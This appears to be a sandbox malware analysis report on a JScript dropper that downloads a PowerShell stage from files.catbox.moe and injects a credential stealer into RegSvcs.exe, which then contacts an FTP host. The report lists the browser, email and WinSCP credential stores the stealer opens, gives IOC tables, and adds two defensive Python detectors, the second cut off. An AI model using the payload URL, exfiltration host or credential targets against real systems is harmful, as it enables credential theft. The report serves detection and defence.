              Source: Yara match File source: 00000006.00000002.2899470696.0000000005930000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000006.00000002.2887524458.00000000031AE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000006.00000002.2886300151.0000000002E8F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000006.00000002.2887524458.0000000003182000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000006.00000002.2896062999.0000000004151000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000006.00000002.2898667090.0000000005730000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 5212, type: MEMORYSTR
              Source: Yara match File source: 6.2.RegSvcs.exe.2ed064e.2.unpack, type: UNPACKEDPE
              Source: Yara match File source: 6.2.RegSvcs.exe.5730000.6.unpack, type: UNPACKEDPE
              Source: Yara match File source: 6.2.RegSvcs.exe.2ecf766.1.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 6.2.RegSvcs.exe.5730000.6.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 6.2.RegSvcs.exe.41a4590.4.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 6.2.RegSvcs.exe.2ed064e.2.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 6.2.RegSvcs.exe.5930ee8.8.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 6.2.RegSvcs.exe.5930000.7.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 6.2.RegSvcs.exe.41a4590.4.unpack, type: UNPACKEDPE
              Source: Yara match File source: 6.2.RegSvcs.exe.5930ee8.8.unpack, type: UNPACKEDPE
              Source: Yara match File source: 6.2.RegSvcs.exe.4156458.5.unpack, type: UNPACKEDPE
              Source: Yara match File source: 6.2.RegSvcs.exe.5930000.7.unpack, type: UNPACKEDPE
              Source: Yara match File source: 6.2.RegSvcs.exe.4156458.5.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 6.2.RegSvcs.exe.4155570.3.unpack, type: UNPACKEDPE
              Source: Yara match File source: 6.2.RegSvcs.exe.4155570.3.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 6.2.RegSvcs.exe.2ecf766.1.unpack, type: UNPACKEDPE
              Source: Yara match File source: 00000006.00000002.2899470696.0000000005930000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000006.00000002.2886300151.0000000002E8F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000006.00000002.2896062999.0000000004151000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000006.00000002.2898667090.0000000005730000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\FTP Navigator\Ftplist.txt
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
              Source: x.exe Binary or memory string: WIN_XP
              Source: x.exe.3.dr Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPWIN_2000InstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 8, 1USERPROFILEUSERDOMAINUSERDNSDOMAINDefaultGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYadvapi32.dllRegDeleteKeyExW+.-.+-\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]ISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXISTSEXPANDmsctls_statusbar321tooltips_class32AutoIt v3 GUI%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----&
              Source: x.exe Binary or memory string: WIN_XPe
              Source: x.exe Binary or memory string: WIN_VISTA
              Source: x.exe Binary or memory string: WIN_7
              Source: x.exe Binary or memory string: WIN_8
              Source: Yara match File source: 6.2.RegSvcs.exe.2ed064e.2.unpack, type: UNPACKEDPE
              Source: Yara match File source: 6.2.RegSvcs.exe.5730000.6.unpack, type: UNPACKEDPE
              Source: Yara match File source: 6.2.RegSvcs.exe.2ecf766.1.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 6.2.RegSvcs.exe.5730000.6.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 6.2.RegSvcs.exe.41a4590.4.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 6.2.RegSvcs.exe.2ed064e.2.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 6.2.RegSvcs.exe.5930ee8.8.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 6.2.RegSvcs.exe.5930000.7.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 6.2.RegSvcs.exe.41a4590.4.unpack, type: UNPACKEDPE
              Source: Yara match File source: 6.2.RegSvcs.exe.5930ee8.8.unpack, type: UNPACKEDPE
              Source: Yara match File source: 6.2.RegSvcs.exe.4156458.5.unpack, type: UNPACKEDPE
              Source: Yara match File source: 6.2.RegSvcs.exe.5930000.7.unpack, type: UNPACKEDPE
              Source: Yara match File source: 6.2.RegSvcs.exe.4156458.5.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 6.2.RegSvcs.exe.4155570.3.unpack, type: UNPACKEDPE
              Source: Yara match File source: 6.2.RegSvcs.exe.4155570.3.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 6.2.RegSvcs.exe.2ecf766.1.unpack, type: UNPACKEDPE
              Source: Yara match File source: 00000006.00000002.2899470696.0000000005930000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000006.00000002.2886300151.0000000002E8F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000006.00000002.2887524458.0000000003182000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000006.00000002.2896062999.0000000004151000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000006.00000002.2898667090.0000000005730000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 5212, type: MEMORYSTR

              Remote Access Functionality

              Source: Yara match File source: 6.2.RegSvcs.exe.2ed064e.2.unpack, type: UNPACKEDPE
              Source: Yara match File source: 6.2.RegSvcs.exe.5730000.6.unpack, type: UNPACKEDPE
              Source: Yara match File source: 6.2.RegSvcs.exe.2ecf766.1.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 6.2.RegSvcs.exe.5730000.6.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 6.2.RegSvcs.exe.41a4590.4.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 6.2.RegSvcs.exe.2ed064e.2.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 6.2.RegSvcs.exe.5930ee8.8.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 6.2.RegSvcs.exe.5930000.7.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 6.2.RegSvcs.exe.41a4590.4.unpack, type: UNPACKEDPE
              Source: Yara match File source: 6.2.RegSvcs.exe.5930ee8.8.unpack, type: UNPACKEDPE
              Source: Yara match File source: 6.2.RegSvcs.exe.4156458.5.unpack, type: UNPACKEDPE
              Source: Yara match File source: 6.2.RegSvcs.exe.5930000.7.unpack, type: UNPACKEDPE
              Source: Yara match File source: 6.2.RegSvcs.exe.4156458.5.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 6.2.RegSvcs.exe.4155570.3.unpack, type: UNPACKEDPE
              Source: Yara match File source: 6.2.RegSvcs.exe.4155570.3.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 6.2.RegSvcs.exe.2ecf766.1.unpack, type: UNPACKEDPE
              Source: Yara match File source: 00000006.00000002.2899470696.0000000005930000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000006.00000002.2887524458.00000000031AE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000006.00000002.2886300151.0000000002E8F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000006.00000002.2887524458.0000000003182000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000006.00000002.2896062999.0000000004151000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000006.00000002.2898667090.0000000005730000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 5212, type: MEMORYSTR
              Source: Yara match File source: 6.2.RegSvcs.exe.2ed064e.2.unpack, type: UNPACKEDPE
              Source: Yara match File source: 6.2.RegSvcs.exe.5730000.6.unpack, type: UNPACKEDPE
              Source: Yara match File source: 6.2.RegSvcs.exe.2ecf766.1.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 6.2.RegSvcs.exe.5730000.6.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 6.2.RegSvcs.exe.41a4590.4.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 6.2.RegSvcs.exe.2ed064e.2.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 6.2.RegSvcs.exe.5930ee8.8.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 6.2.RegSvcs.exe.5930000.7.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 6.2.RegSvcs.exe.41a4590.4.unpack, type: UNPACKEDPE
              Source: Yara match File source: 6.2.RegSvcs.exe.5930ee8.8.unpack, type: UNPACKEDPE
              Source: Yara match File source: 6.2.RegSvcs.exe.4156458.5.unpack, type: UNPACKEDPE
              Source: Yara match File source: 6.2.RegSvcs.exe.5930000.7.unpack, type: UNPACKEDPE
              Source: Yara match File source: 6.2.RegSvcs.exe.4156458.5.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 6.2.RegSvcs.exe.4155570.3.unpack, type: UNPACKEDPE
              Source: Yara match File source: 6.2.RegSvcs.exe.4155570.3.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 6.2.RegSvcs.exe.2ecf766.1.unpack, type: UNPACKEDPE
              Source: Yara match File source: 00000006.00000002.2899470696.0000000005930000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000006.00000002.2886300151.0000000002E8F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000006.00000002.2896062999.0000000004151000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000006.00000002.2898667090.0000000005730000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 5_2_004652BE socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket
              Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 5_2_00476619 socket,WSAGetLastError,bind,WSAGetLastError,closesocket
              Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 5_2_0046CEF3 OleInitialize,_wcslen,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,GetActiveObject
MITRE ATT&CK matrix (techniques with matching signatures, grouped by tactic):

• Resource Development: Scripting
• Initial Access: Valid Accounts
• Execution: Windows Management Instrumentation; Native API; Exploitation for Client Execution; Command and Scripting Interpreter; PowerShell
• Persistence: Scripting; DLL Side-Loading; Valid Accounts
• Privilege Escalation: Exploitation for Privilege Escalation; DLL Side-Loading; Valid Accounts; Access Token Manipulation; Process Injection
• Defense Evasion: Disable or Modify Tools; Deobfuscate/Decode Files or Information; Obfuscated Files or Information; Software Packing; DLL Side-Loading; Masquerading; Valid Accounts; Virtualization/Sandbox Evasion; Access Token Manipulation; Process Injection
• Credential Access: OS Credential Dumping; Input Capture; Credentials in Registry
• Discovery: System Time Discovery; Account Discovery; File and Directory Discovery; System Information Discovery; Security Software Discovery; Virtualization/Sandbox Evasion; Process Discovery; Application Window Discovery; System Owner/User Discovery; System Network Configuration Discovery
• Collection: Archive Collected Data; Data from Local System; Email Collection; Input Capture; Clipboard Data
• Command and Control: Ingress Tool Transfer; Encrypted Channel; Non-Application Layer Protocol; Application Layer Protocol
• Impact: System Shutdown/Reboot
• Reconnaissance, Lateral Movement, Exfiltration: no matching signatures
Behavior Graph ID: 1579018 | Sample: doc00290320092.jse | Start date: 20/12/2024 | Architecture: WINDOWS | Score: 100

Sample-level network nodes: ip-api.com, ftp.jeepcommerce.rs, files.catbox.moe
Sample-level signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 11 other signatures

Process chain:

1. wscript.exe (1 16), started from the sample
   • Network: files.catbox.moe 108.181.20.35 port 443 (local port 49707), ASN852CA, Canada
   • Dropped: C:\Temp\dddddd.ps1 (ASCII)
   • Signatures: System process connects to network (likely due to code injection or exploit); Wscript starts Powershell (via cmd or directly); Windows Scripting host queries suspicious COM object (likely to drop second stage); Suspicious execution chain found
2. powershell.exe (13), started by wscript.exe; also starts conhost.exe
   • Dropped: C:\Users\user\AppData\Local\Temp\x.exe (PE32)
   • Signatures: Found suspicious powershell code related to unpacking or dynamic code loading; Powershell drops PE file
3. x.exe (2), started by powershell.exe
   • Signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; 3 other signatures
4. RegSvcs.exe (15 2), started by x.exe
   • Network: ip-api.com 208.95.112.1 port 80 (local port 49708), TUT-ASUS, United States; ftp.jeepcommerce.rs 195.252.110.253 port 21 (local port 49710), BEOTEL-AShttpwwwbeotelnetRS, Serbia
   • Signatures: Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines); Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines); 5 other signatures
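The chain above (wscript.exe dropping C:\Temp\dddddd.ps1, PowerShell writing x.exe into the user's Temp directory, x.exe starting RegSvcs.exe) is what the "Wscript starts Powershell" and "Suspicious execution chain found" signatures key on. The following is an added example, not Joe Sandbox's own code, of checking Sysmon-style process-creation records for that ancestry; the event records, PIDs, command lines and the list of .NET injection targets beyond RegSvcs.exe are constructed for the example and are not taken from this report.

```python
"""Process-ancestry checks for the wscript -> powershell -> dropped PE -> RegSvcs.exe
chain. Added example, not Joe Sandbox code. Records mimic Sysmon Event ID 1 fields
(Image, ParentProcessId, CommandLine); PIDs and paths are constructed."""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str      # full path, as in Sysmon "Image"
    cmdline: str


# Constructed events modelled on the behaviour graph (PIDs made up for the example).
EVENTS = [
    ProcEvent(1000, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(2000, 1000, r"C:\Windows\System32\wscript.exe",
              r'wscript.exe "C:\Users\user\Desktop\doc00290320092.jse"'),
    ProcEvent(3000, 2000, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell.exe -ExecutionPolicy Bypass -File C:\Temp\dddddd.ps1"),
    ProcEvent(3001, 3000, r"C:\Windows\System32\conhost.exe", "conhost.exe 0xffffffff -ForceV1"),
    ProcEvent(4000, 3000, r"C:\Users\user\AppData\Local\Temp\x.exe",
              r'"C:\Users\user\AppData\Local\Temp\x.exe"'),
    ProcEvent(5000, 4000, r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe",
              r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"'),
    # Benign control: an interactive PowerShell started from Explorer.
    ProcEvent(6000, 1000, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe"),
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
# .NET framework utilities that .NET loaders commonly hollow; the report shows RegSvcs.exe,
# the others are assumed additions for the example.
INJECT_TARGETS = {"regsvcs.exe", "regasm.exe", "installutil.exe", "msbuild.exe"}
# Directories an unprivileged user can write to (assumed list for the example).
USER_WRITABLE = re.compile(r"^c:\\(users\\[^\\]+\\appdata\\|temp\\|users\\public\\)", re.I)


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def ancestry(pid: int, events) -> list:
    """Image basenames from the root ancestor down to pid (cycle-safe)."""
    by_pid = {e.pid: e for e in events}
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(basename(by_pid[pid].image))
        pid = by_pid[pid].ppid
    return chain[::-1]


def wscript_dropper_hits(events) -> list:
    """Script host spawning a shell. Returns the PIDs of the spawned shells."""
    by_pid = {e.pid: e for e in events}
    hits = []
    for e in events:
        parent = by_pid.get(e.ppid)
        if parent is not None and basename(parent.image) in SCRIPT_HOSTS \
                and basename(e.image) in SHELLS:
            hits.append(e.pid)
    return hits


def suspicious_chain_hits(events) -> list:
    """Script host -> shell -> binary in a user-writable directory -> .NET utility
    that is a common injection target. Returns (pid, chain) per matching process."""
    by_pid = {e.pid: e for e in events}
    hits = []
    for e in events:
        if basename(e.image) not in INJECT_TARGETS:
            continue
        parent = by_pid.get(e.ppid)
        if parent is None or not USER_WRITABLE.match(parent.image):
            continue
        above = ancestry(parent.pid, events)[:-1]   # ancestors of the dropped binary
        host_idx = [i for i, n in enumerate(above) if n in SCRIPT_HOSTS]
        shell_idx = [i for i, n in enumerate(above) if n in SHELLS]
        # The shell must sit below the script host, as in the graph above.
        if host_idx and shell_idx and host_idx[0] < shell_idx[-1]:
            hits.append((e.pid, ancestry(e.pid, events)))
    return hits


if __name__ == "__main__":
    for pid, chain in suspicious_chain_hits(EVENTS):
        print(pid, " -> ".join(chain))
```

The chain rule deliberately anchors on the dropped binary's directory rather than its name: x.exe is arbitrary, but a .NET utility whose parent lives under AppData or C:\Temp is not something an administrator normally produces, and the benign explorer.exe -> powershell.exe control in the events does not trip either rule.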

Antivirus detection, submitted file (Source | Detection | Scanner | Label):
doc00290320092.jse | 13% | ReversingLabs |

Antivirus detection, dropped files (Source | Detection | Scanner | Label):
C:\Users\user\AppData\Local\Temp\x.exe | 100% | Avira | HEUR/AGEN.1321703
C:\Users\user\AppData\Local\Temp\x.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\x.exe | 35% | ReversingLabs |
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
Contacted domains (Name | IP | Active | Malicious | Antivirus Detection | Reputation):
files.catbox.moe | 108.181.20.35 | true | false | | high
ftp.jeepcommerce.rs | 195.252.110.253 | true | false | | high
ip-api.com | 208.95.112.1 | true | false | | high
Contacted URLs (Name | Malicious | Antivirus Detection | Reputation):
https://files.catbox.moe/gj7umd.ps1 | false | | high
http://ip-api.com/line/?fields=hosting | false | | high
URLs found in memory or binary data (Name | Malicious | Antivirus Detection | Reputation | Source):
• https://files.catbox.moe; | false | | unknown | wscript.exe, 00000001.00000003.1773041087.000001B50AA7B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1774814812.000001B50AA80000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1772583063.000001B50CC25000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1771488602.000001B50AA7B000.00000004.00000020.00020000.00000000.sdmp
• https://files.catbox.moe/gj7umd.ps1:CreateObject | false | | high | wscript.exe, 00000001.00000003.1772155185.000001B50AA47000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1773041087.000001B50AA7B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1774814812.000001B50AA80000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1774713133.000001B50AA64000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1773562345.000001B50AA60000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1771488602.000001B50AA7B000.00000004.00000020.00020000.00000000.sdmp
• http://nuget.org/NuGet.exe | false | | high | powershell.exe, 00000003.00000002.1741313249.00000244CBFC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1712669013.00000244BD62C000.00000004.00000800.00020000.00000000.sdmp
• http://www.apache.org/licenses/LICENSE-2.0 | false | | high | powershell.exe, 00000003.00000002.1712669013.00000244BCEA7000.00000004.00000800.00020000.00000000.sdmp
• https://account.dyn.com/ | false | | high | RegSvcs.exe, 00000006.00000002.2899470696.0000000005930000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2886300151.0000000002E8F000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2896062999.0000000004151000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2898667090.0000000005730000.00000004.08000000.00040000.00000000.sdmp
• http://pesterbdd.com/images/Pester.png | false | | high | powershell.exe, 00000003.00000002.1712669013.00000244BD4B8000.00000004.00000800.00020000.00000000.sdmp
• http://www.apache.org/licenses/LICENSE-2.0.html | false | | high | powershell.exe, 00000003.00000002.1712669013.00000244BD4B8000.00000004.00000800.00020000.00000000.sdmp
• https://contoso.com/ | false | | high | powershell.exe, 00000003.00000002.1712669013.00000244BD62C000.00000004.00000800.00020000.00000000.sdmp
• https://nuget.org/nuget.exe | false | | high | powershell.exe, 00000003.00000002.1741313249.00000244CBFC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1712669013.00000244BD62C000.00000004.00000800.00020000.00000000.sdmp
• https://contoso.com/License | false | | high | powershell.exe, 00000003.00000002.1712669013.00000244BD62C000.00000004.00000800.00020000.00000000.sdmp
• http://ip-api.com | false | | high | RegSvcs.exe, 00000006.00000002.2887524458.0000000003151000.00000004.00000800.00020000.00000000.sdmp
• https://contoso.com/Icon | false | | high | powershell.exe, 00000003.00000002.1712669013.00000244BD62C000.00000004.00000800.00020000.00000000.sdmp
• https://oneget.orgX | false | | high | powershell.exe, 00000003.00000002.1712669013.00000244BCEA7000.00000004.00000800.00020000.00000000.sdmp
• http://ftp.jeepcommerce.rs | false | | unknown | RegSvcs.exe, 00000006.00000002.2887524458.00000000031AE000.00000004.00000800.00020000.00000000.sdmp
• https://files.catbox.moe/ | false | | high | wscript.exe, 00000001.00000003.1773587473.000001B50CDED000.00000004.00000020.00020000.00000000.sdmp
• https://aka.ms/pscore68 | false | | high | powershell.exe, 00000003.00000002.1712669013.00000244BB751000.00000004.00000800.00020000.00000000.sdmp
• https://files.catbox.moe | false | | high | wscript.exe, 00000001.00000003.1773041087.000001B50AA7B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1774814812.000001B50AA80000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1772583063.000001B50CC25000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1771488602.000001B50AA7B000.00000004.00000020.00020000.00000000.sdmp
• http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | false | | high | powershell.exe, 00000003.00000002.1712669013.00000244BB751000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2887524458.0000000003151000.00000004.00000800.00020000.00000000.sdmp
• https://github.com/Pester/Pester | false | | high | powershell.exe, 00000003.00000002.1712669013.00000244BD4B8000.00000004.00000800.00020000.00000000.sdmp
• https://files.catbox.moe/gj7umd.ps1u | false | | high | wscript.exe, 00000001.00000003.1627015912.000001B50C95E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1773818837.000001B50C95E000.00000004.00000020.00020000.00000000.sdmp
• https://oneget.org | false | | high | powershell.exe, 00000003.00000002.1712669013.00000244BCEA7000.00000004.00000800.00020000.00000000.sdmp
Contacted public IPs (IP | Domain | Country | ASN | ASN Name | Malicious):
208.95.112.1 | ip-api.com | United States | 53334 | TUT-ASUS | false
108.181.20.35 | files.catbox.moe | Canada | 852 | ASN852CA | false
195.252.110.253 | ftp.jeepcommerce.rs | Serbia | 6700 | BEOTEL-AShttpwwwbeotelnetRS | false
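As an added example that is not part of the report, the indicators from the domain, URL and IP tables above are run against Zeek-style dns, ssl, http and conn records. The log lines are constructed to mirror the traffic seen in this analysis (they are not from the report's PCAP); the closing correlation, an ip-api.com hosting check from a host that then opens FTP, is an assumption about what separates this sample's use of ip-api.com from the service's many legitimate users, not a signature the report states.

```python
"""Match this report's network indicators against Zeek-style logs and look for the
hosting-check-then-FTP shape. Added example, not Joe Sandbox code; the log records
below are constructed, and the correlation rule is an assumption, not a report signature."""
import csv
import io
from urllib.parse import urlsplit

# Indicators copied from the report's domain, IP and URL tables.
IOC_DOMAINS = {"files.catbox.moe", "ftp.jeepcommerce.rs"}
IOC_IPS = {"108.181.20.35", "195.252.110.253"}
IOC_URLS = {"https://files.catbox.moe/gj7umd.ps1"}
# ip-api.com is widely used by legitimate software; only this path is treated as a signal.
HOSTING_CHECK = ("ip-api.com", "/line/?fields=hosting")

# Constructed tab-separated records (Zeek field names, reduced to what the rules need).
DNS_LOG = """ts\tid.orig_h\tquery\tanswers
1.0\t10.0.0.5\tfiles.catbox.moe\t108.181.20.35
2.0\t10.0.0.5\tip-api.com\t208.95.112.1
3.0\t10.0.0.5\tftp.jeepcommerce.rs\t195.252.110.253
4.0\t10.0.0.9\twww.example.com\t93.184.216.34
"""
SSL_LOG = """ts\tid.orig_h\tid.resp_h\tserver_name
1.1\t10.0.0.5\t108.181.20.35\tfiles.catbox.moe
"""
HTTP_LOG = """ts\tid.orig_h\tid.resp_h\thost\turi
2.1\t10.0.0.5\t208.95.112.1\tip-api.com\t/line/?fields=hosting
5.0\t10.0.0.9\t208.95.112.1\tip-api.com\t/json
"""
CONN_LOG = """ts\tid.orig_h\tid.resp_h\tid.resp_p\tproto
1.2\t10.0.0.5\t108.181.20.35\t443\ttcp
3.1\t10.0.0.5\t195.252.110.253\t21\ttcp
6.0\t10.0.0.9\t93.184.216.34\t443\ttcp
"""


def rows(log: str) -> list:
    return list(csv.DictReader(io.StringIO(log), delimiter="\t"))


def scan(dns_log=DNS_LOG, ssl_log=SSL_LOG, http_log=HTTP_LOG, conn_log=CONN_LOG) -> list:
    """Return (ts, source_host, kind, detail) for every record touching an indicator."""
    ioc_hosts = IOC_DOMAINS | {urlsplit(u).hostname for u in IOC_URLS}
    out = []
    for r in rows(dns_log):
        if r["query"] in ioc_hosts or r["answers"] in IOC_IPS:
            out.append((float(r["ts"]), r["id.orig_h"], "ioc_dns", f"{r['query']} -> {r['answers']}"))
    for r in rows(ssl_log):
        # The .ps1 download was over TLS, so the URL path is invisible; match on SNI/destination.
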